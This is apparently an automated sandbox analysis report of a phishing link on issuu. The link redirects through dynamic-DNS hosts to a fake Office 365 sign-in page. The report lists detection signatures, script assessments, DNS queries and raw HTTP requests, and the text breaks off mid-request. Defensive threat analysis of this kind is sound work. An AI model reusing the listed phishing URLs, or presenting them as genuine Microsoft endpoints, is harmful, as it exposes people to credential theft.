Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQ

Overview

General Information

Sample URL:https://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQ
Analysis ID:1580520
Infos:

Detection

HTMLPhisher
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish54
AI detected suspicious Javascript
Uses dynamic DNS services
HTML body contains low number of good links
HTML page contains hidden javascript code
HTML title does not match URL

Classification

  • System is w10x64
  • chrome.exe (PID: 3132 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 5104 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2404 --field-trial-handle=2252,i,13392327784317788276,4031343908889293815,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6608 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://issuu.com/txbct.com/docs/navex_quote_65169.?fr=xKAE9_zU1NQ" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
0.15.i.script.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
    3.5.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
      3.4.pages.csvJoeSecurity_HtmlPhish_54Yara detected HtmlPhish_54Joe Security
        No Sigma rule has matched
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results

        Phishing

        barindex
        Source: Yara matchFile source: 0.15.i.script.csv, type: HTML
        Source: Yara matchFile source: 3.5.pages.csv, type: HTML
        Source: Yara matchFile source: 3.4.pages.csv, type: HTML
        Source: 0.11.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.d... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated URLs and the interaction with untrusted domains further increases the risk. Overall, this script demonstrates a clear intent to engage in malicious activities and should be considered a high-risk threat.
        Source: 0.17.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.d... This script demonstrates several high-risk behaviors, including redirecting the user to an unknown domain and potentially collecting sensitive information (session ID) without transparency. The use of obfuscated code and the attempt to prevent the script from running in an iframe context further raise suspicions about the script's intent. While the script may have a legitimate purpose, the overall behavior and lack of transparency suggest a medium to high risk level that warrants further investigation.
        Source: 3.19..script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.d... This script demonstrates several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to potentially malicious domains. The script appears to be attempting to automatically fill in login credentials and submit a login form, which is a common phishing technique. While the script may have a legitimate purpose, the lack of transparency and the use of obfuscated code raise significant security concerns.
        Source: https://o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638706670443158735.NjEyOTY2YWEtYmM4NC00MmY4LWJlYzAtZmI2Njc1MDdiYTM4YmNiY2Q5MDgtYzcxZC00MDQxLWJhYzQtMzgxMWIzZmZjNjUz&ui_locales=en-US&mkt=en-US&client-request-id=4dfcef0d-412d-42f2-af6e-84f873e236e5&state=SYvXn_A8fmitoKoJgOEE6nv6Xn6nhj0UgKrwhoLBAC6KMgmo96NvkInoYIttEw4eBbyLTuFXXAFVez0c7AO6XWEMUKzJd7dgbntRCNoa2bsNNjTJDnEbXQ9OPfemsMdo_2evV4tuDbJWTQngJvNAAfQuo4T_2WlCcOtuWjhcx0F-oKx53Bkh49JmU59ZcdIzQsGNqOW1XCsMk4J_hQdrqPaT8Fex2dLaiK2aZOQikwYH82LTuL3tQroxvodJyi8os2Tw7OOSe-JsaI3T7quX_w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Number of links: 0
        Source: https://assets-eur.mkt.dynamics.com/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/digitalassets/standaloneforms/afd683a8-7bbc-ef11-b8e9-000d3a43cf29HTTP Parser: Base64 decoded: <svg width='16' height='16' viewBox='0 0 16 16' fill='none' xmlns='http://www.w3.org/2000/svg'><path d='M10.1328 0.296875C10.9974 0.53125 11.7891 0.898438 12.5078 1.39844C13.2266 1.89323 13.8438 2.48177 14.3594 3.16406C14.8802 3.84115 15.2839 4.59375 15.5...
        Source: https://o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638706670443158735.NjEyOTY2YWEtYmM4NC00MmY4LWJlYzAtZmI2Njc1MDdiYTM4YmNiY2Q5MDgtYzcxZC00MDQxLWJhYzQtMzgxMWIzZmZjNjUz&ui_locales=en-US&mkt=en-US&client-request-id=4dfcef0d-412d-42f2-af6e-84f873e236e5&state=SYvXn_A8fmitoKoJgOEE6nv6Xn6nhj0UgKrwhoLBAC6KMgmo96NvkInoYIttEw4eBbyLTuFXXAFVez0c7AO6XWEMUKzJd7dgbntRCNoa2bsNNjTJDnEbXQ9OPfemsMdo_2evV4tuDbJWTQngJvNAAfQuo4T_2WlCcOtuWjhcx0F-oKx53Bkh49JmU59ZcdIzQsGNqOW1XCsMk4J_hQdrqPaT8Fex2dLaiK2aZOQikwYH82LTuL3tQroxvodJyi8os2Tw7OOSe-JsaI3T7quX_w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: Title: Sign in to your account does not match URL
        Source: https://assets-eur.mkt.dynamics.com/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/digitalassets/standaloneforms/afd683a8-7bbc-ef11-b8e9-000d3a43cf29HTTP Parser: No favicon
        Source: https://assets-eur.mkt.dynamics.com/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/digitalassets/standaloneforms/afd683a8-7bbc-ef11-b8e9-000d3a43cf29HTTP Parser: No favicon
        Source: https://assets-eur.mkt.dynamics.com/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/digitalassets/standaloneforms/afd683a8-7bbc-ef11-b8e9-000d3a43cf29HTTP Parser: No favicon
        Source: https://o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638706670443158735.NjEyOTY2YWEtYmM4NC00MmY4LWJlYzAtZmI2Njc1MDdiYTM4YmNiY2Q5MDgtYzcxZC00MDQxLWJhYzQtMzgxMWIzZmZjNjUz&ui_locales=en-US&mkt=en-US&client-request-id=4dfcef0d-412d-42f2-af6e-84f873e236e5&state=SYvXn_A8fmitoKoJgOEE6nv6Xn6nhj0UgKrwhoLBAC6KMgmo96NvkInoYIttEw4eBbyLTuFXXAFVez0c7AO6XWEMUKzJd7dgbntRCNoa2bsNNjTJDnEbXQ9OPfemsMdo_2evV4tuDbJWTQngJvNAAfQuo4T_2WlCcOtuWjhcx0F-oKx53Bkh49JmU59ZcdIzQsGNqOW1XCsMk4J_hQdrqPaT8Fex2dLaiK2aZOQikwYH82LTuL3tQroxvodJyi8os2Tw7OOSe-JsaI3T7quX_w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
        Source: https://o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638706670443158735.NjEyOTY2YWEtYmM4NC00MmY4LWJlYzAtZmI2Njc1MDdiYTM4YmNiY2Q5MDgtYzcxZC00MDQxLWJhYzQtMzgxMWIzZmZjNjUz&ui_locales=en-US&mkt=en-US&client-request-id=4dfcef0d-412d-42f2-af6e-84f873e236e5&state=SYvXn_A8fmitoKoJgOEE6nv6Xn6nhj0UgKrwhoLBAC6KMgmo96NvkInoYIttEw4eBbyLTuFXXAFVez0c7AO6XWEMUKzJd7dgbntRCNoa2bsNNjTJDnEbXQ9OPfemsMdo_2evV4tuDbJWTQngJvNAAfQuo4T_2WlCcOtuWjhcx0F-oKx53Bkh49JmU59ZcdIzQsGNqOW1XCsMk4J_hQdrqPaT8Fex2dLaiK2aZOQikwYH82LTuL3tQroxvodJyi8os2Tw7OOSe-JsaI3T7quX_w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="author".. found
        Source: https://o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638706670443158735.NjEyOTY2YWEtYmM4NC00MmY4LWJlYzAtZmI2Njc1MDdiYTM4YmNiY2Q5MDgtYzcxZC00MDQxLWJhYzQtMzgxMWIzZmZjNjUz&ui_locales=en-US&mkt=en-US&client-request-id=4dfcef0d-412d-42f2-af6e-84f873e236e5&state=SYvXn_A8fmitoKoJgOEE6nv6Xn6nhj0UgKrwhoLBAC6KMgmo96NvkInoYIttEw4eBbyLTuFXXAFVez0c7AO6XWEMUKzJd7dgbntRCNoa2bsNNjTJDnEbXQ9OPfemsMdo_2evV4tuDbJWTQngJvNAAfQuo4T_2WlCcOtuWjhcx0F-oKx53Bkh49JmU59ZcdIzQsGNqOW1XCsMk4J_hQdrqPaT8Fex2dLaiK2aZOQikwYH82LTuL3tQroxvodJyi8os2Tw7OOSe-JsaI3T7quX_w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found
        Source: https://o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638706670443158735.NjEyOTY2YWEtYmM4NC00MmY4LWJlYzAtZmI2Njc1MDdiYTM4YmNiY2Q5MDgtYzcxZC00MDQxLWJhYzQtMzgxMWIzZmZjNjUz&ui_locales=en-US&mkt=en-US&client-request-id=4dfcef0d-412d-42f2-af6e-84f873e236e5&state=SYvXn_A8fmitoKoJgOEE6nv6Xn6nhj0UgKrwhoLBAC6KMgmo96NvkInoYIttEw4eBbyLTuFXXAFVez0c7AO6XWEMUKzJd7dgbntRCNoa2bsNNjTJDnEbXQ9OPfemsMdo_2evV4tuDbJWTQngJvNAAfQuo4T_2WlCcOtuWjhcx0F-oKx53Bkh49JmU59ZcdIzQsGNqOW1XCsMk4J_hQdrqPaT8Fex2dLaiK2aZOQikwYH82LTuL3tQroxvodJyi8os2Tw7OOSe-JsaI3T7quX_w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0HTTP Parser: No <meta name="copyright".. found

        Networking

        barindex
        Source: unknownDNS query: name: o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
        Source: unknownDNS query: name: logedkdyvah.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
        Source: unknownDNS query: name: officnxdbenbwamg.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
        Source: unknownDNS query: name: vezzjxkd.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.org
        Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
        Source: unknownTCP traffic detected without corresponding DNS query: 23.54.80.57
        Source: unknownTCP traffic detected without corresponding DNS query: 23.54.80.57
        Source: unknownTCP traffic detected without corresponding DNS query: 217.20.58.98
        Source: unknownTCP traffic detected without corresponding DNS query: 217.20.58.98
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /ajax/libs/react/17.0.2/umd/react.production.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://issuu.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/react-dom/17.0.2/umd/react-dom.production.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://issuu.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/react-is/17.0.2/umd/react-is.production.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://issuu.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/styled-components/5.3.11/styled-components.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://issuu.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/react/17.0.2/umd/react.production.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/react-is/17.0.2/umd/react-is.production.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/styled-components/5.3.11/styled-components.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /ajax/libs/react-dom/17.0.2/umd/react-dom.production.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /api/4506104688082944/envelope/?sentry_key=20169667e5c7bfec02249a8341e145fa&sentry_version=7&sentry_client=sentry.javascript.browser%2F7.108.0 HTTP/1.1Host: o4505883345354752.ingest.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /v1/public/setup/issuu_web?user_id=5932e7dc-5014-446b-8909-bfa725841c50&app_version=0 HTTP/1.1Host: spidersense.bendingspoons.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/jsonAccept: */*Origin: https://issuu.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://issuu.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /v1/public/setup/issuu_web?user_id=5932e7dc-5014-446b-8909-bfa725841c50&app_version=0 HTTP/1.1Host: spidersense.bendingspoons.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /2e20bdf4-acb6-ef11-8a66-000d3a3a0951/digitalassets/standaloneforms/afd683a8-7bbc-ef11-b8e9-000d3a43cf29 HTTP/1.1Host: assets-eur.mkt.dynamics.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://issuu.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /api/v1.0/orgs/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/landingpageforms/forms/afd683a8-7bbc-ef11-b8e9-000d3a43cf29/visits HTTP/1.1Host: public-eur.mkt.dynamics.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /hJEchGjd HTTP/1.1Host: officnxdbenbwamg.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.orgConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET /api/v1.0/orgs/2e20bdf4-acb6-ef11-8a66-000d3a3a0951/landingpageforms/forms/afd683a8-7bbc-ef11-b8e9-000d3a43cf29 HTTP/1.1Host: public-eur.mkt.dynamics.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.orgConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fec4-fe6b=82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda
        Source: global trafficHTTP traffic detected: GET /login HTTP/1.1Host: vezzjxkd.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.orgConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: fec4-fe6b=82e8cc673220c3f4fcabf71ef3d323242272c5ea4eddb1d6aedd6258f9cc4cda
        Source: global trafficHTTP traffic detected: GET /common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638706670443158735.NjEyOTY2YWEtYmM4NC00MmY4LWJlYzAtZmI2Njc1MDdiYTM4YmNiY2Q5MDgtYzcxZC00MDQxLWJhYzQtMzgxMWIzZmZjNjUz&ui_locales=en-US&mkt=en-US&client-request-id=4dfcef0d-412d-42f2-af6e-84f873e236e5&state=SYvXn_A8fmitoKoJgOEE6nv6Xn6nhj0UgKrwhoLBAC6KMgmo96NvkInoYIttEw4eBbyLTuFXXAFVez0c7AO6XWEMUKzJd7dgbntRCNoa2bsNNjTJDnEbXQ9OPfemsMdo_2evV4tuDbJWTQngJvNAAfQuo4T_2WlCcOtuWjhcx0F-oKx53Bkh49JmU59ZcdIzQsGNqOW1XCsMk4J_hQdrqPaT8Fex2dLaiK2aZOQikwYH82LTuL3tQroxvodJyi8os2Tw7OOSe-JsaI3T7quX_w&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0 HTTP/1.1Host: o365.ceccdyrsvhhymfdwnfwghhbpxprqsbyjsyt.duckdns.orgConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: 